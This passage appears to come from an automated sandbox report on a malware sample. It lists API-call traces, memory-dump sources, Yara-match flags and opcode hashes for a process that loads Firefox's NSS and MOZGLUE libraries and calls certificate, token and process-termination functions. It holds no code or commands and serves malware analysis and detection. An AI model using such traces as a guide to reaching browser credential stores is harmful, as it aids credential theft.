                                                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C438FE0), ref: 6C316CFE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2370200771-0
                                                                                                                                                                                                                                              • Opcode ID: 3d5439529496c6f46b22348ace742eebc35478f34bf19a013ed42b6fe7d27e77
                                                                                                                                                                                                                                              • Instruction ID: 17adedb576fececa961186eb9a50262f226ee29c0fab442a302d581fdb829cd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d5439529496c6f46b22348ace742eebc35478f34bf19a013ed42b6fe7d27e77
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 723181B1A052169FDB08DFA5C891ABFBBF5EF89248B10442DD905D7B00EB319905CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                                                                                                                              • Opcode ID: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
                                                                                                                                                                                                                                              • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415BEB
                                                                                                                                                                                                                                                • Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                                • Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                                • Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CD6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                                                                                                                              • Opcode ID: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
                                                                                                                                                                                                                                              • Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C3004F1
                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C30053B
                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C300558
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C30057A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3051374878-0
                                                                                                                                                                                                                                              • Opcode ID: 0f4ea0cdbd95bf6982146bffba549812d572b1a00ce9421abaf1bd9adf0ae1e2
                                                                                                                                                                                                                                              • Instruction ID: 45016e92d9889350af6228a6aa0be2dc3c621b2fe1a270e3f3ef76a441f96e89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f4ea0cdbd95bf6982146bffba549812d572b1a00ce9421abaf1bd9adf0ae1e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B214C71B00218AFDB08DF69DC94AAEB7B8FF48308B108029E8099B351D731E906CF91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6C33ACC2
                                                                                                                                                                                                                                                • Part of subcall function 6C312F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C312F0A
                                                                                                                                                                                                                                                • Part of subcall function 6C312F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C312F1D
                                                                                                                                                                                                                                                • Part of subcall function 6C312AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C310A1B,00000000), ref: 6C312AF0
                                                                                                                                                                                                                                                • Part of subcall function 6C312AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C312B11
                                                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6C33AD5E
                                                                                                                                                                                                                                                • Part of subcall function 6C3557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C31B41E,00000000,00000000,?,00000000,?,6C31B41E,00000000,00000000,00000001,?), ref: 6C3557E0
                                                                                                                                                                                                                                                • Part of subcall function 6C3557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C355843
                                                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6C33AD36
                                                                                                                                                                                                                                                • Part of subcall function 6C312F50: CERT_DestroyCertificate.NSS3(?), ref: 6C312F65
                                                                                                                                                                                                                                                • Part of subcall function 6C312F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C312F83
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C33AD4F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                                                                                              • Opcode ID: f1e2e3e8c497593c004cddb1fb2e0b4e30550a3818444363e7992b03d60efbc5
                                                                                                                                                                                                                                              • Instruction ID: d7ff1001f33e22478e54dfd7567961a0ae3bfa4e7df35ea5a29c940297262844
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1e2e3e8c497593c004cddb1fb2e0b4e30550a3818444363e7992b03d60efbc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A221C6B1D001648FEF11EFA4D9055EEB7B4EF05218F455068D8487B710FB36AA55CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C3524FF
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C35250F
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C35253C
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C352554
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                                                              • Opcode ID: cc7bad3a2030405f879feffe75a83e926b740a736d60f5e2844c53290ead340e
                                                                                                                                                                                                                                              • Instruction ID: 9288bae8d313ba53a6774aa5e165332783a431422102b47ed37cb46d8b46c68c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7bad3a2030405f879feffe75a83e926b740a736d60f5e2844c53290ead340e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11E972A00114ABDF00FF68DC459BB7B78EF4A328B854524EC48A7715E732E954CBE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C36F0AD,6C36F150,?,6C36F150,?,?,?), ref: 6C36ECBA
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C36ECD1
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C36ED02
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37116E
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C36ED5A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                              • Instruction ID: 6dd0a28a2423f307d3537044e3ac02438bb95aa5048f1f708e6ce7ae9d6bf559
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 032184B19007429FE700CF26DD44B52B7E4BFA5348F15C215E81C87A61F771E594CAE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EDD4
                                                                                                                                                                                                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EDFD
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EE14
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6C389767,00000000,00000000,6C387FFA,?,6C389767,?,8B7874C0,0000A48E), ref: 6C39EE33
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3903481028-0
                                                                                                                                                                                                                                              • Opcode ID: ed43b5174f5345b845a14cf6a59121e422115f84f76986ba77be71aeebf55e8d
                                                                                                                                                                                                                                              • Instruction ID: eec404b1edce13945f3cf1cc50ca673ef7fb9bb30c248981a314a80c0ba11a9e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed43b5174f5345b845a14cf6a59121e422115f84f76986ba77be71aeebf55e8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 371173B5E04706ABEB109EA5DC84B46B3A8FB0435DF244535E91996A40F331E4648FE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C3A5F17,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BAC94
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C3A5F17,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACA6
                                                                                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACC0
                                                                                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C3AAAD4), ref: 6C3BACDB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                                                                                              • Opcode ID: 64a8eb071193a8928ab685f04e67a1ed6755491eb686a4bf67c19c5c8bc6e9ec
                                                                                                                                                                                                                                              • Instruction ID: f8c85c04c2ff6f5fbc85438109714107066fd6adc6f136a6624d8e1c667a8ecf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64a8eb071193a8928ab685f04e67a1ed6755491eb686a4bf67c19c5c8bc6e9ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1015EB1701B419BEB50EF6AD908767B7E8BF10A59B104839D89AD3E00E731F054CF91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcatlstrcpy
                                                                                                                                                                                                                                              • String ID: 6F@$6F@
                                                                                                                                                                                                                                              • API String ID: 3905823039-140834422
                                                                                                                                                                                                                                              • Opcode ID: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
                                                                                                                                                                                                                                              • Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C34C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C34C154,?), ref: 6C3724FA
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000,?,6C34C154,?), ref: 6C372509
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C372525
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C372532
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
